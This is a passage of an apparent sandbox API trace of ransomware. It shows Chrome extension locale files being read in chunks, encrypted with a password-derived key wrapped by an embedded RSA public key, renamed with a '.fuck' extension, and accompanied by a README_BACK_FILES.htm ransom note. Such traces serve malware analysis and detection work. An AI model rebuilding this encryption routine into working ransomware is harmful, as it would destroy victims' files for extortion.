dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x379, lpOverlapped=0x0) returned 1 [0262.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x379, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.987] CloseHandle (hObject=0x5d60) returned 1 [0262.987] CloseHandle (hObject=0x5d5c) returned 1 [0262.987] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), bFailIfExists=0) returned 1 [0262.990] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json", dwFileAttributes=0x0) returned 1 [0262.990] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg")) returned 1 [0262.991] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.fuck")) returned 1 [0262.992] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.992] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0262.992] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.993] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.993] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.993] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\readme_back_files.htm")) returned 0xffffffff [0262.993] AreFileApisANSI () returned 1 [0262.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.993] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.994] GetFileType (hFile=0x5d64) returned 0x1 [0262.994] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.995] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.995] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.995] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.995] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.995] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.995] GetLastError () returned 0x0 [0262.995] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json")) returned 0x20 [0262.996] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0262.996] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.997] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.997] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.998] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.000] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.000] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.000] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.000] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.000] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.000] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.000] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73bd0) returned 1 [0263.000] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73bd0, dwCertEncodingType=0x1, pInfo=0x2eadde0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eade10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eade18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e600) returned 1 [0263.000] CryptEncrypt (in: hKey=0x2e7e600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.001] CryptEncrypt (in: hKey=0x2e7e600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e742b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e742b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.001] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e742b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e742b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.002] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.008] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.008] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.022] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.022] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.022] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.023] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.023] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.023] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.023] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.023] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.023] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 